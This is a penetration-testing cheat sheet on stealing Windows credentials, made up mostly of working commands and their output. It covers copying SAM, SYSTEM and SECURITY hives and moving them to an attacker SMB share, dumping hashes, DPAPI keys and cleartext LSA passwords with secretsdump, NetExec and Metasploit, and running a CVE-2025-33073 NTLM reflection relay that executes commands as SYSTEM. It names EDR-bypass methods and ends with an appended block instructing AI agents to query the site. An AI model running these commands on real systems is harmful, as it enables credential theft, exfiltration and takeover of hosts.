# SAM & LSA secrets [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) {% hint style="info" %} You need at least local admin privilege on the remote target, use option **--local-auth** if your user is a local account {% endhint %}
## Shadow Copies / Snapshots {% embed url="" %} ### Enumerate the host for shadow copy volumes ``` *Evil-WinRM* PS C:\Users\Administrator\Documents> vssadmin list shadows vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2013 Microsoft Corp. Contents of shadow copy set ID: {00168<-SNIP->d07ca} Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM Shadow Copy ID: {04639<-SNIP->b017ef} Original Volume: (C:)\\?\Volume{21385<-SNIP->0000}\ Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 Originating Machine: foo.bar.local Service Machine: foo.bar.local Provider: 'Microsoft Software Shadow Copy provider 1.0' Type: ClientAccessible Attributes: Persistent, Client-accessible, No auto release, No writers, Differential ``` ``` *Evil-WinRM* PS C:\Users\Administrator\Desktop> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ *Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SAM Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command Info: Downloading C:\\VSS\\windows\\system32\\config\\SAM to SAM Info: Download successful! *Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SYSTEM Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command Info: Downloading C:\\VSS\\windows\\system32\\config\\SYSTEM to SYSTEM Info: Download successful! *Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SECURITY Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command Info: Downloading C:\\VSS\\windows\\system32\\config\\SECURITY to SECURITY Info: Download successful! *Evil-WinRM* PS C:\Users\Administrator\Desktop> ``` ``` $ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL ``` With Mimikatz {% embed url="" %} ## Step by step - Manual * Create a Shadow Snapshot ``` wmic shadowcopy call create Volume='C:\' ``` ``` C:\Users\peter>wmic /node:192.168.24.153 /user:peter /password:[***] shadowcopy call create Volume='C:\' Executing (Win32_ShadowCopy)->create() Method execution successful. Out Parameters: instance of __PARAMETERS { ReturnValue = 0; ShadowID = "{037BE7D1-2915-422A-B961-13065D469BE7}"; }; C:\Users\peter> ``` * Get the path listing them ``` vssadmin list shadows [...] Contents of shadow copy set ID: {5590bae6-9edc-4012-b58a-5ff54e937cae} Contained 1 shadow copies at creation time: 03/06/2025 17:12:36 Shadow Copy ID: {6efd3825-90a8-465e-8205-f445f2775769} Original Volume: (C:)\?\Volume{1d680c6d-69f7-4ad4-8177-b8240d0cf94c}\Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 [...] ``` * Access the Shadow Snapshot and navigate to *Windows\System32\Config*. One of the easiest methods was to use 7z, in latest versions it is not possible. ### Over SMB - Automation Impacket -use-remoteSSMethod ``` impacket-secretsdump -use-remoteSSMethod “./Admin:1234@192.168.1.161” ``` ## SAM | Registry Hive | Description | | --------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | `hklm\sam` | Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. | | `hklm\system` | Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. | | `hklm\security` | Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target. | ### Windows ```cmd-session C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save The operation completed successfully. C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save The operation completed successfully. C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save The operation completed successfully. ``` #### Transfer files Also see {% content-ref url="/pages/VdH4oG0HRdKPhKMPMtsD" %} [Download - Exfiltration](/0xss0rz/pentest/file-transfer/download-exfiltration.md) {% endcontent-ref %} ```shell-session $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` ```cmd-session C:\> move sam.save \\10.10.15.16\CompData 1 file(s) moved. C:\> move security.save \\10.10.15.16\CompData 1 file(s) moved. C:\> move system.save \\10.10.15.16\CompData 1 file(s) moved. ``` #### esentutl.exe {% embed url="" %} ### **Secretsdump** ```shell-session $ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b::: defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857::: bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33::: rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d::: ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643 dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362 [*] NL$KM 0000 D7 0A F4 B9 1E 3E 77 34 94 8F C4 7D AC 8F 60 69 .....>w4...}..`i 0010 52 E1 2B 74 FF B2 08 5F 59 FE 32 19 D6 A7 2C F8 R.+t..._Y.2...,. 0020 E2 A4 80 E0 0F 3D F8 48 44 98 87 E1 C9 CD 4B 28 .....=.HD.....K( 0030 9B 7B 8B BF 3D 59 DB 90 D8 C7 AB 62 93 30 6A 42 .{..=Y.....b.0jB NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42 [*] Cleaning up... ``` Only SAM and SYSTEM ``` secretsdump -sam SAM -system SYSTEM LOCAL ```
### Metasploit {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} ``` meterpreter > hashdump ``` ``` meterpreter > lsa_dump_sam ``` ### Netexec - CME {% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %} [NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md) {% endcontent-ref %} ``` nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam ``` #### Local admin ```shell-session $ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False) SMB 10.129.42.198 445 WS01 [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!) SMB 10.129.42.198 445 WS01 [+] Dumping SAM hashes SMB 10.129.42.198 445 WS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.129.42.198 445 WS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.129.42.198 445 WS01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.129.42.198 445 WS01 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e::: SMB 10.129.42.198 445 WS01 bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: SMB 10.129.42.198 445 WS01 sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc::: SMB 10.129.42.198 445 WS01 rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321::: SMB 10.129.42.198 445 WS01 worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: SMB 10.129.42.198 445 WS01 [+] Added 8 SAM hashes to the database ``` ### Mimikatz {% content-ref url="/pages/RyOH5l3XbYdEQwoowuVE" %} [Mimikatz](/0xss0rz/pentest/tools/mimikatz.md) {% endcontent-ref %} ### SilentSAM Leverage raw disk access and parsing the NTFS Master File Table (MFT) {% embed url="" %} ### SAMDump {% embed url="" %} ### SharpSAMDump {% embed url="" %} ### CVE-2025-33073 - NTLM Reflection {% hint style="danger" %} *In the context of CVE-2025-33073, machines with SMB signing enforced were not affected by the vulnerability, even without Microsoft's patch.* {% endhint %} **Prerequisites:** * The target machine hasn't applied the **June 10th update** * **SMB signing is not required** (which is the default on Windows 10, Server 2022, and older builds of Windows 11) * **Users can add DNS records** (default configuration) **Exploitation:** * Add a DNS record with a crafted name (`1UWhRCA...`) * Launch `ntlmrelayx` * Trigger a coercion attack like **PetitPotam** ``` $ dnstool.py -u 'ASGARD.LOCAL\loki' -p loki 192.168.56.10 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.56.3 [-] Adding new record [+] LDAP operation completed successfully $ PetitPotam.py -u loki -p loki -d ASGARD.LOCAL srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA SRV1.ASGARD.LOCAL [-] Sending EfsRpcEncryptFileSrv! [+] Got expected ERROR_BAD_NETPATH exception!! [+] Attack worked! # ntlmrelayx.py -t SRV1.ASGARD.LOCAL -smb2support [*] Servers started, waiting for connections [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.56.14, attacking target smb://SRV1.ASGARD.LOCAL [*] Authenticating against smb://SRV1.ASGARD.LOCAL as / SUCCEED [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x0c10b250470be78cbe1c92d1b7fe4e91 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:df3c08415194a27d27bb67dcbf6a6ebc::: user:1000:aad3b435b51404eeaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70::: [*] Done dumping SAM hashes for host: 192.168.56.14 ``` {% embed url="" %} Other method: {% embed url="" %} 1 . Coercion ``` $ wspcoerce 'lab.redteam/user1:KojbyRyibdinWom)@client1.lab.redteam' \ file:////client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA/path Impacket v0.13.0.dev0+20250408.175013.349160df - Copyright 2023 Fortra [*] Connected to IPC$ [*] Opened MsFteWds pipe [*] Sent WSP Connect [*] Sent WSP Query [*] Sent WSP Disconnect ``` 2. Answer local name resolution queries ``` $ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \ --spoof '*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA*' Pretender by RedTeam Pentesting v1.3.2-74e629fcc5 Listening on interface: eth1 IPv4 relayed to: 192.168.56.11 IPv6 relayed to: fe80::a00:27ff:fe89:bdac Answering queries for: *1uwhrcaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaybaaaa* [mDNS] listening via UDP on [ff02::fb%eth1]:5353 [NetBIOS] listening via UDP on 192.168.56.255:137 [LLMNR] listening via UDP on [ff02::1:3%eth1]:5355 [mDNS] listening via UDP on 224.0.0.251:5353 [LLMNR] listening via UDP on 224.0.0.252:5355 [...] [mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam) [mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10) [mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (PCSSystemtec) [mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10) [LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10) [LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam) [LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10) [LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (client1.lab.redteam) ``` 3. Relay the ticket back to the victim ``` $ krbrelayx.py --target smb://client1.lab.redteam -c whoami [...] [*] SMBD: Received connection from 192.168.56.10 [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Executed specified command on host: client1.lab.redteam nt authority\system [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry ``` More PoC: {% embed url="" %} {% embed url="" %} Example: {% embed url="" %} ### Cracking {% content-ref url="/pages/5HMI5x51XIr5GBqw1pWM" %} [Hashes](/0xss0rz/pentest/cracking/hashes.md) {% endcontent-ref %} #### Online {% embed url="" %} ### Pass the Hash (PtH) {% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %} [Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md) {% endcontent-ref %} ## LSA ### Netexec - CME {% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %} [NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md) {% endcontent-ref %} ```shell-session $ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False) SMB 10.129.42.198 445 WS01 [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!) SMB 10.129.42.198 445 WS01 [+] Dumping LSA secrets SMB 10.129.42.198 445 WS01 WS01\worker:Hello123 SMB 10.129.42.198 445 WS01 dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a SMB 10.129.42.198 445 WS01 NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b ``` #### GMSA If you found an account starting with *`SC_GMSA`*`{84A78B8C-56EE-465b-8496-FFB35A1B52A7`} you can get the account behind: ``` nxc ldap -u -p --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c50fd6f72c99a1e79f27bd0cbd4df69fdf08b5cf6fa7928cf6924cf55bfd8dd505b1da26ddf5695f5333dd07d08673029b01082e548e31f1ad16c67db0116c6ab0f8d2a0f6f36ff30b160b7c78502d5df93232f72d6397b44571d1939a2d18bb9c28a5a48266f52737c934669e038e22d3ba5a7ae63a608f3074c520201f372d740fddec77a8fed4ddfc5b63ce7c4643b60a8c4c739e0d0c7078dd0c2fcbc2849e561ea2de1af7a004b462b1ff62ab4d3db5945a6227a58ed24461a634b85f939eeed392cf3fe9359f28f3daa8cb74edb9eef7dd38f44ed99fa7df5d10ea1545994012850980a7b3becba0000d22d957218fb7297b216e2d7272a4901f65c93ee0dbc4891d4eba49dda5354b0f2c359f185e6bb943da9bcfbd2abda591299cf166c28cb36907d1ba1a8956004b5e872ef851810689cec9578baae261b45d29d99aef743f3d9dcfbc5f89172c9761c706ea3ef16f4b553db628010e627dd42e3717208da1a2902636d63dabf1526597d94307c6b70a5acaf4bb2a1bdab05e38eb2594018e3ffac0245fcdb6afc5a36a5f98f5910491e85669f45d02e230cb633a4e64368205ac6fc3b0ba62d516283623670b723f906c2b3d40027791ab2ae97a8c5c135aae85da54a970e77fb46087d0e2233d062dcd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000' ``` {% embed url="" %} ### regsecrets.py {% hint style="success" %} *Opsec* {% endhint %} {% embed url="" %} {% embed url="" %} ### Bypass LSA Protection (aka Protected Process Light) {% embed url="" %} ## Bypass EDR {% embed url="" %} ## Backup Operators Group ``` whoami /groups ``` {% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %} [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md) {% endcontent-ref %} ### Linux ``` smbserver.py -smb2support "someshare" "./" ``` ``` # reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SAM' -o '\\10.10.14.6\someshare' Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs [!] Cannot check RemoteRegistry status. Hoping it is started... [*] Saved HKLM\SAM to \\10.10.14.6\someshare\SAM.save # reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.6\someshare' Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs [!] Cannot check RemoteRegistry status. Hoping it is started... [*] Saved HKLM\SYSTEM to \\10.10.14.6\someshare\SYSTEM.save # reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SECURITY' -o '\\10.10.14.6\someshare' Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs [!] Cannot check RemoteRegistry status. Hoping it is started... [*] Saved HKLM\SECURITY to \\10.10.14.6\someshare\SECURITY.save ``` ``` secretsdump.py -sam 'SAM.save' -security 'SECURITY.save' -system 'SYSTEM.save' LOCAL ``` ### Windows ```cmd-session C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV The operation completed successfully. C:\htb> reg save HKLM\SAM SAM.SAV The operation completed successfully. ``` ## Go-Secdump {% embed url="" %} ``` ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2 ``` ## Volatility3 - Hashdump ### Dump memory acquisition from victim host - With WinPmem or FTK Imager {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Hashdump / Lsadump ``` ./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM) ./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry ./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets ``` {% embed url="" %} {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} ## Interesting Book {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} ***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.* {% endhint %} * [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\ Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations * [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\ Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory. * [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\ A quick reference when there is no time to scour the Internet for that perfect command * [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\ The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide. * [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\ A practical guide to building a penetration testing program having homefield advantage ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.